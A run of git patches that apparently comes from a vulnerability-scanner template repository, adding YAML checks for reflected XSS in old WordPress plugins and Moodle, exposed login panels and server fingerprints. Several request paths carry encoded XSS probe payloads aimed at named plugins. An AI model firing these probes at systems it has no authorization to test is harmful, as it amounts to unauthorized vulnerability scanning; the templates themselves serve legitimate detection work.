word + part: header + words: + - text/html + + - type: status + status: + - 200 From a6ec5edc8d148512c44680f35252be4e70cc2d57 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 14 Jul 2021 00:07:06 +0700 Subject: [PATCH 0529/4083] Create CVE-2011-5179.yaml --- cves/2011/CVE-2011-5179.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2011/CVE-2011-5179.yaml diff --git a/cves/2011/CVE-2011-5179.yaml b/cves/2011/CVE-2011-5179.yaml new file mode 100644 index 0000000000..525fb30022 --- /dev/null +++ b/cves/2011/CVE-2011-5179.yaml @@ -0,0 +1,29 @@ +id: CVE-2011-5179 + +info: + name: Skysa App Bar 1.04 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5179 + tags: cve,cve2011,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From cdc64106ad3bf55cfe96661299990657d69d50cf Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 14 Jul 2021 00:08:59 +0700 Subject: [PATCH 0530/4083] Create CVE-2011-5181.yaml --- cves/2011/CVE-2011-5181.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2011/CVE-2011-5181.yaml diff --git a/cves/2011/CVE-2011-5181.yaml b/cves/2011/CVE-2011-5181.yaml new file mode 100644 index 0000000000..6231df7e08 --- /dev/null +++ b/cves/2011/CVE-2011-5181.yaml @@ -0,0 +1,29 @@ +id: CVE-2011-5181 + +info: + name: ClickDesk Live Support - Live Chat 2.0 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5181 + tags: cve,cve2011,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 2171814982af06a925279ee0fc2e52a92877b52e Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 14 Jul 2021 00:10:26 +0700 Subject: [PATCH 0531/4083] Update CVE-2011-5181.yaml --- cves/2011/CVE-2011-5181.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2011/CVE-2011-5181.yaml b/cves/2011/CVE-2011-5181.yaml index 6231df7e08..9fbd09ccba 100644 --- a/cves/2011/CVE-2011-5181.yaml +++ b/cves/2011/CVE-2011-5181.yaml @@ -1,7 +1,7 @@ id: CVE-2011-5181 info: - name: ClickDesk Live Support - Live Chat 2.0 - Reflected Cross-Site Scripting (XSS) + name: ClickDesk Live Support Live Chat 2.0 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5181 From 52712e17387fd018aecd3cad59c48cb1677f2fe9 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 14 Jul 2021 00:12:07 +0700 Subject: [PATCH 0532/4083] Create CVE-2011-5265.yaml --- cves/2011/CVE-2011-5265.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2011/CVE-2011-5265.yaml diff --git a/cves/2011/CVE-2011-5265.yaml b/cves/2011/CVE-2011-5265.yaml new file mode 100644 index 0000000000..fc3176a45a --- /dev/null +++ b/cves/2011/CVE-2011-5265.yaml @@ -0,0 +1,29 @@ +id: CVE-2011-5265 + +info: + name: Featurific For WordPress 1.6.2 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5265 + tags: cve,cve2011,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From a64856f00506c39ae07808ccfc2ceeaadfcc64ee Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 14 Jul 2021 00:13:20 +0700 Subject: [PATCH 0533/4083] Create CVE-2012-0901.yaml --- cves/2012/CVE-2012-0901.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2012/CVE-2012-0901.yaml diff --git a/cves/2012/CVE-2012-0901.yaml b/cves/2012/CVE-2012-0901.yaml new file mode 100644 index 0000000000..165a3c2afc --- /dev/null +++ b/cves/2012/CVE-2012-0901.yaml @@ -0,0 +1,29 @@ +id: CVE-2012-0901 + +info: + name: YouSayToo auto-publishing 1.0 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2012-0901 + tags: cve,cve2012,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 660d2341fb6a8e5473c1e35a932a51bd2c04a5f3 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 14 Jul 2021 00:14:36 +0700 Subject: [PATCH 0534/4083] Create CVE-2012-2371.yaml --- cves/2012/CVE-2012-2371.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2012/CVE-2012-2371.yaml diff --git a/cves/2012/CVE-2012-2371.yaml b/cves/2012/CVE-2012-2371.yaml new file mode 100644 index 0000000000..3e63655c9b --- /dev/null +++ b/cves/2012/CVE-2012-2371.yaml @@ -0,0 +1,29 @@ +id: CVE-2012-2371 + +info: + name: WP-FaceThumb 0.1 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2012-2371 + tags: cve,cve2012,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%22%3E%3Cimg%2Fsrc%3Dx%20onerror%3Dalert%28123%29%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From e2221a68f68126cc9934fb8d00ecd009380d7879 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 14 Jul 2021 00:15:23 +0700 Subject: [PATCH 0535/4083] Create CVE-2012-5913.yaml --- cves/2012/CVE-2012-5913.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2012/CVE-2012-5913.yaml diff --git a/cves/2012/CVE-2012-5913.yaml b/cves/2012/CVE-2012-5913.yaml new file mode 100644 index 0000000000..3feacd8a7f --- /dev/null +++ b/cves/2012/CVE-2012-5913.yaml @@ -0,0 +1,29 @@ +id: CVE-2012-5913 + +info: + name: WordPress Integrator 1.32 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2012-5913 + tags: cve,cve2012,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3CScrIpT%3Ealert%28123%29%3C%2FScrIpT%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From fc35b4c56dd8349e353015fead9f49f2d495497b Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 13 Jul 2021 18:58:52 +0000 Subject: [PATCH 0536/4083] Update CVE-2017-5487.yaml Fixes #1985 --- cves/2017/CVE-2017-5487.yaml | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/cves/2017/CVE-2017-5487.yaml b/cves/2017/CVE-2017-5487.yaml index 7322de0480..866847913c 100644 --- a/cves/2017/CVE-2017-5487.yaml +++ b/cves/2017/CVE-2017-5487.yaml @@ -2,7 +2,7 @@ id: CVE-2017-5487 info: name: WordPress Core < 4.7.1 - Username Enumeration - author: Manas_Harsh,daffainfo + author: Manas_Harsh,daffainfo,geeknik severity: info description: wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request. tags: cve,cve2017,wordpress @@ -18,6 +18,11 @@ requests: matchers-condition: and matchers: + - type: word + part: header + words: + - "application/json" + - type: status status: - 200 @@ -27,4 +32,4 @@ requests: - '"id":' - '"name":' - '"avatar_urls":' - condition: and \ No newline at end of file + condition: and From 120906682a625d817eede7b9160b63c9f57e7ec9 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 14 Jul 2021 01:11:19 +0530 Subject: [PATCH 0537/4083] Create faraday-login.yaml --- exposed-panels/faraday-login.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposed-panels/faraday-login.yaml diff --git a/exposed-panels/faraday-login.yaml b/exposed-panels/faraday-login.yaml new file mode 100644 index 0000000000..5d4cb2b93c --- /dev/null +++ b/exposed-panels/faraday-login.yaml @@ -0,0 +1,23 @@ +id: faraday-login + +info: + name: Faraday Login + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=html%3A%22faradayApp%22 + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}/#/login' + + matchers-condition: and + matchers: + - type: word + words: + - 'ng-app="faradayApp">' + condition: and + - type: status + status: + - 200 From 9b3cc7b31da63e106db5e30b257917851b89b2ce Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Wed, 14 Jul 2021 01:30:03 +0530 Subject: [PATCH 0538/4083] Update faraday-login.yaml --- exposed-panels/faraday-login.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exposed-panels/faraday-login.yaml b/exposed-panels/faraday-login.yaml index 5d4cb2b93c..26856e1e03 100644 --- a/exposed-panels/faraday-login.yaml +++ b/exposed-panels/faraday-login.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDK severity: info reference: https://www.shodan.io/search?query=html%3A%22faradayApp%22 - tags: panel + tags: panel,faraday requests: - method: GET @@ -17,7 +17,7 @@ requests: - type: word words: - 'ng-app="faradayApp">' - condition: and + - type: status status: - 200 From 21d6811e5fc5437aba2c38528857992cfa1b57df Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 13 Jul 2021 20:01:21 +0000 Subject: [PATCH 0539/4083] Auto Update README [Tue Jul 13 20:01:21 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 794c825152..2cbd749e5e 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 401 | vulnerabilities | 225 | exposed-panels | 196 | +| cves | 401 | vulnerabilities | 225 | exposed-panels | 197 | | takeovers | 70 | exposures | 114 | technologies | 117 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1504 files**. +**127 directories, 1505 files**. From a3d72f69032a9f10d86af39bcd61b1109cb5e179 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 14 Jul 2021 02:17:51 +0530 Subject: [PATCH 0540/4083] Create adobe-media-server.yaml --- exposed-panels/adobe-media-server.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposed-panels/adobe-media-server.yaml diff --git a/exposed-panels/adobe-media-server.yaml b/exposed-panels/adobe-media-server.yaml new file mode 100644 index 0000000000..4796f2b9ac --- /dev/null +++ b/exposed-panels/adobe-media-server.yaml @@ -0,0 +1,25 @@ +id: adobe-media-server + +info: + name: Adobe Media Server + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Adobe+Media+Server%22 + tags: panel,adobe + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'Adobe Media Server' + + condition: and + + - type: status + status: + - 200 From f53bb42bfb4f9029dc94e7b535ebbabd5c7f1933 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 14 Jul 2021 02:21:30 +0530 Subject: [PATCH 0541/4083] Create default-codeigniter-page.yaml --- technologies/default-codeigniter-page.yaml | 25 ++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 technologies/default-codeigniter-page.yaml diff --git a/technologies/default-codeigniter-page.yaml b/technologies/default-codeigniter-page.yaml new file mode 100644 index 0000000000..88251292b9 --- /dev/null +++ b/technologies/default-codeigniter-page.yaml @@ -0,0 +1,25 @@ +id: default-codeigniter-page + +info: + name: Default CodeIgniter Page + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Welcome+to+CodeIgniter%22 + tags: tech,codeigniter + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'Welcome to CodeIgniter' + + condition: and + + - type: status + status: + - 200 From 3e870377f6a78eda55b1e9b375058b8bb2ee4eb6 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 14 Jul 2021 02:24:43 +0530 Subject: [PATCH 0542/4083] Create default-ibm-http-server.yaml --- technologies/default-ibm-http-server.yaml | 25 +++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 technologies/default-ibm-http-server.yaml diff --git a/technologies/default-ibm-http-server.yaml b/technologies/default-ibm-http-server.yaml new file mode 100644 index 0000000000..108aeae31a --- /dev/null +++ b/technologies/default-ibm-http-server.yaml @@ -0,0 +1,25 @@ +id: default-ibm-http-server + +info: + name: Default IBM HTTP Server + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22IBM-HTTP-Server%22 + tags: tech,ibm + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'IBM HTTP Server' + + condition: and + + - type: status + status: + - 200 From 96a4bdf7a685f0a899149d085531b672fa90cd62 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 14 Jul 2021 02:28:45 +0530 Subject: [PATCH 0543/4083] Create oracle-http-server-12c.yaml --- technologies/oracle-http-server-12c.yaml | 25 ++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 technologies/oracle-http-server-12c.yaml diff --git a/technologies/oracle-http-server-12c.yaml b/technologies/oracle-http-server-12c.yaml new file mode 100644 index 0000000000..2fab8681e7 --- /dev/null +++ b/technologies/oracle-http-server-12c.yaml @@ -0,0 +1,25 @@ +id: oracle-http-server-12c + +info: + name: Oracle HTTP Server 12c + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+HTTP+Server+12c%22 + tags: tech,oracle + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'Oracle HTTP Server 12c' + + condition: and + + - type: status + status: + - 200 From 30273ced1a48b56b644aa94a6a54d4592f6c407e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 14 Jul 2021 02:33:29 +0530 Subject: [PATCH 0544/4083] Create splunk-login.yaml --- exposed-panels/splunk-login.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposed-panels/splunk-login.yaml diff --git a/exposed-panels/splunk-login.yaml b/exposed-panels/splunk-login.yaml new file mode 100644 index 0000000000..53ec2d2323 --- /dev/null +++ b/exposed-panels/splunk-login.yaml @@ -0,0 +1,25 @@ +id: splunk-login + +info: + name: Splunk SOAR + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Splunk+SOAR%22 + tags: panel,splunk + +requests: + - method: GET + path: + - '{{BaseURL}}/login?next=/' + + matchers-condition: and + matchers: + - type: word + words: + - 'Splunk SOAR' + + condition: and + + - type: status + status: + - 200 From ac24819d5928a0339ac723de59df19e22af54043 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 14 Jul 2021 02:48:22 +0530 Subject: [PATCH 0545/4083] Create coldfusion-administrator-login.yaml --- .../coldfusion-administrator-login.yaml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposed-panels/coldfusion-administrator-login.yaml diff --git a/exposed-panels/coldfusion-administrator-login.yaml b/exposed-panels/coldfusion-administrator-login.yaml new file mode 100644 index 0000000000..c5ae353a26 --- /dev/null +++ b/exposed-panels/coldfusion-administrator-login.yaml @@ -0,0 +1,25 @@ +id: coldfusion-administrator-login + +info: + name: ColdFusion Administrator Login + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22ColdFusion+Administrator+Login%22 + tags: panel,adobe + +requests: + - method: GET + path: + - '{{BaseURL}}/CFIDE/administrator/' + + matchers-condition: and + matchers: + - type: word + words: + - 'ColdFusion Administrator Login' + + condition: and + + - type: status + status: + - 200 From 5838f76600fb5ec473625dc68a81836ef690af2d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 14 Jul 2021 12:37:51 +0530 Subject: [PATCH 0546/4083] Create exposed-glances-api.yaml --- exposures/logs/exposed-glances-api.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposures/logs/exposed-glances-api.yaml diff --git a/exposures/logs/exposed-glances-api.yaml b/exposures/logs/exposed-glances-api.yaml new file mode 100644 index 0000000000..7705889fb1 --- /dev/null +++ b/exposures/logs/exposed-glances-api.yaml @@ -0,0 +1,25 @@ +id: exposed-glances-api +info: + name: Exposed Glances API + author: princechaddha + severity: low + description: Glances is a cross-platform system monitoring tool written in Python. + reference: https://nicolargo.github.io/glances/ + tags: glances,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - 'title">Glances' + - 'glances.config' + - '' + part: body + condition: and From 360f8d9a943a43475dfeb2cf6d5ebf8b1e22e9cb Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Wed, 14 Jul 2021 14:20:18 +0530 Subject: [PATCH 0547/4083] Update exposed-glances-api.yaml --- exposures/logs/exposed-glances-api.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/exposures/logs/exposed-glances-api.yaml b/exposures/logs/exposed-glances-api.yaml index 7705889fb1..8c2bcf81af 100644 --- a/exposures/logs/exposed-glances-api.yaml +++ b/exposures/logs/exposed-glances-api.yaml @@ -10,12 +10,14 @@ info: requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - 'title">Glances' From e634a4b466735c1b7b75c708581b6433e7448862 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 14 Jul 2021 09:05:43 +0000 Subject: [PATCH 0548/4083] Auto Update README [Wed Jul 14 09:05:43 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 2cbd749e5e..3751c63dae 100644 --- a/README.md +++ b/README.md @@ -39,12 +39,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 401 | vulnerabilities | 225 | exposed-panels | 197 | -| takeovers | 70 | exposures | 114 | technologies | 117 | +| takeovers | 70 | exposures | 115 | technologies | 117 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1505 files**. +**127 directories, 1506 files**. From 5580fd92798302c7e277d092546165badb9130e7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 14 Jul 2021 15:06:05 +0530 Subject: [PATCH 0549/4083] Update adobe-media-server.yaml --- exposed-panels/adobe-media-server.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/adobe-media-server.yaml b/exposed-panels/adobe-media-server.yaml index 4796f2b9ac..62e932e74d 100644 --- a/exposed-panels/adobe-media-server.yaml +++ b/exposed-panels/adobe-media-server.yaml @@ -17,7 +17,7 @@ requests: - type: word words: - 'Adobe Media Server' - + - 'Adobe Systems Incorporated' condition: and - type: status From 8c96d36ac28249ead9f2815e68a63f11c7b49e13 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 14 Jul 2021 15:16:55 +0530 Subject: [PATCH 0550/4083] Update coldfusion-administrator-login.yaml --- exposed-panels/coldfusion-administrator-login.yaml | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/exposed-panels/coldfusion-administrator-login.yaml b/exposed-panels/coldfusion-administrator-login.yaml index c5ae353a26..217efea2ee 100644 --- a/exposed-panels/coldfusion-administrator-login.yaml +++ b/exposed-panels/coldfusion-administrator-login.yaml @@ -5,12 +5,12 @@ info: author: dhiyaneshDK severity: info reference: https://www.shodan.io/search?query=http.title%3A%22ColdFusion+Administrator+Login%22 - tags: panel,adobe + tags: panel,coldfusion,adobe requests: - method: GET path: - - '{{BaseURL}}/CFIDE/administrator/' + - '{{BaseURL}}' matchers-condition: and matchers: @@ -18,8 +18,6 @@ requests: words: - 'ColdFusion Administrator Login' - condition: and - - type: status status: - 200 From 429cbdee4aab08dc9c89324194a2086adf89993f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 14 Jul 2021 15:20:00 +0530 Subject: [PATCH 0551/4083] Update splunk-login.yaml --- exposed-panels/splunk-login.yaml | 2 -- 1 file changed, 2 deletions(-) diff --git a/exposed-panels/splunk-login.yaml b/exposed-panels/splunk-login.yaml index 53ec2d2323..1cdc420015 100644 --- a/exposed-panels/splunk-login.yaml +++ b/exposed-panels/splunk-login.yaml @@ -18,8 +18,6 @@ requests: words: - 'Splunk SOAR' - condition: and - - type: status status: - 200 From f7259df034a88f87d1e958cfe6d12540734e3e32 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 14 Jul 2021 15:38:56 +0530 Subject: [PATCH 0552/4083] typo update --- cves/2019/CVE-2019-17538.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-17538.yaml b/cves/2019/CVE-2019-17538.yaml index d4a879970e..0352963436 100644 --- a/cves/2019/CVE-2019-17538.yaml +++ b/cves/2019/CVE-2019-17538.yaml @@ -4,7 +4,7 @@ info: author: pussycat0x severity: high reference: https://github.com/shi-yang/jnoj/issues/53 - tags: cve.cve2019,jnoj,lfi + tags: cve,cve2019,jnoj,lfi requests: - raw: From 1a5a93d2e5348500551b6ac4cd2c3858e1bc74c6 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 14 Jul 2021 16:06:44 +0530 Subject: [PATCH 0553/4083] Update oracle-http-server-12c.yaml --- technologies/oracle-http-server-12c.yaml | 2 -- 1 file changed, 2 deletions(-) diff --git a/technologies/oracle-http-server-12c.yaml b/technologies/oracle-http-server-12c.yaml index 2fab8681e7..a528f8a26f 100644 --- a/technologies/oracle-http-server-12c.yaml +++ b/technologies/oracle-http-server-12c.yaml @@ -18,8 +18,6 @@ requests: words: - 'Oracle HTTP Server 12c' - condition: and - - type: status status: - 200 From 7e258fcae24b718439e9ffb7793e7f327d446252 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 14 Jul 2021 16:07:09 +0530 Subject: [PATCH 0554/4083] template-fix --- vulnerabilities/moodle/moodle-filter-jmol-xss.yaml | 12 ++++++++++-- 1 file changed, 10 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml b/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml index 5552195d46..e5153a78ec 100644 --- a/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml +++ b/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml @@ -5,18 +5,26 @@ info: author: madrobot severity: medium description: Cross-site scripting on Moodle. + reference: https://www.dionach.com/blog/moodle-jmol-plugin-multiple-vulnerabilities/ tags: moodle,xss requests: - method: GET path: - - "{{BaseURL}}/filter/jmol/iframe.php?_USE=%22};alert(1337);//" + - "{{BaseURL}}/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&mimetype=text/html" + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - - '\"};alert(1337);//' + - "" part: body + + - type: word + part: header + words: + - "text/html" \ No newline at end of file From f9e56c02b2321273db1311f9653214ebdedf44b1 Mon Sep 17 00:00:00 2001 From: Robert Vulpe <6614470+nytr0gen@users.noreply.github.com> Date: Wed, 14 Jul 2021 12:45:58 +0200 Subject: [PATCH 0555/4083] [dead-host-with-cname] added extractor --- dns/dead-host-with-cname.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/dns/dead-host-with-cname.yaml b/dns/dead-host-with-cname.yaml index 3d57d9b556..3e40eabae6 100644 --- a/dns/dead-host-with-cname.yaml +++ b/dns/dead-host-with-cname.yaml @@ -21,3 +21,9 @@ dns: - type: word words: - "IN\tCNAME" + + extractors: + - type: regex + group: 1 + regex: + - "IN\tCNAME\t(.+)" From 334b1344114fbd0e43b94c98c38ae223315ba25c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 14 Jul 2021 16:16:43 +0530 Subject: [PATCH 0556/4083] Update default-codeigniter-page.yaml --- technologies/default-codeigniter-page.yaml | 2 -- 1 file changed, 2 deletions(-) diff --git a/technologies/default-codeigniter-page.yaml b/technologies/default-codeigniter-page.yaml index 88251292b9..77f54eae29 100644 --- a/technologies/default-codeigniter-page.yaml +++ b/technologies/default-codeigniter-page.yaml @@ -18,8 +18,6 @@ requests: words: - 'Welcome to CodeIgniter' - condition: and - - type: status status: - 200 From 74c4f507b5b78848a18e91d83f2b0a146fb9b020 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 14 Jul 2021 16:20:22 +0530 Subject: [PATCH 0557/4083] Update CVE-2011-4624.yaml --- cves/2011/CVE-2011-4624.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2011/CVE-2011-4624.yaml b/cves/2011/CVE-2011-4624.yaml index 5b4a43a3fc..6b6eae3e15 100644 --- a/cves/2011/CVE-2011-4624.yaml +++ b/cves/2011/CVE-2011-4624.yaml @@ -4,6 +4,7 @@ info: name: GRAND FlAGallery 1.57 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Cross-site scripting (XSS) vulnerability in facebook.php in the GRAND FlAGallery plugin (flash-album-gallery) before 1.57 for WordPress allows remote attackers to inject arbitrary web script or HTML via the i parameter. reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4624 tags: cve,cve2011,wordpress,xss,wp-plugin From 8b08b7e8cbbbecd5f9224457fc743e25edeb96ca Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 14 Jul 2021 16:23:33 +0530 Subject: [PATCH 0558/4083] Update default-codeigniter-page.yaml --- technologies/default-codeigniter-page.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/technologies/default-codeigniter-page.yaml b/technologies/default-codeigniter-page.yaml index 77f54eae29..3ddd69a3f7 100644 --- a/technologies/default-codeigniter-page.yaml +++ b/technologies/default-codeigniter-page.yaml @@ -14,9 +14,9 @@ requests: matchers-condition: and matchers: - - type: word - words: - - 'Welcome to CodeIgniter' + - type: regex + regex: + - '^Welcome to CodeIgniter\s?(?:[0-9]!)?$' - type: status status: From 08e3f1af8445edcd2d3f903bdbc0a5a6e9130b38 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 14 Jul 2021 18:03:54 +0700 Subject: [PATCH 0559/4083] Create CVE-2016-10956.yaml --- cves/2016/CVE-2016-10956.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 cves/2016/CVE-2016-10956.yaml diff --git a/cves/2016/CVE-2016-10956.yaml b/cves/2016/CVE-2016-10956.yaml new file mode 100644 index 0000000000..4c48c18707 --- /dev/null +++ b/cves/2016/CVE-2016-10956.yaml @@ -0,0 +1,25 @@ +id: CVE-2016-10956 + +info: + name: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI) + author: daffainfo + severity: high + description: The mail-masta plugin 1.0 for WordPress has local file inclusion in count_of_send.php and 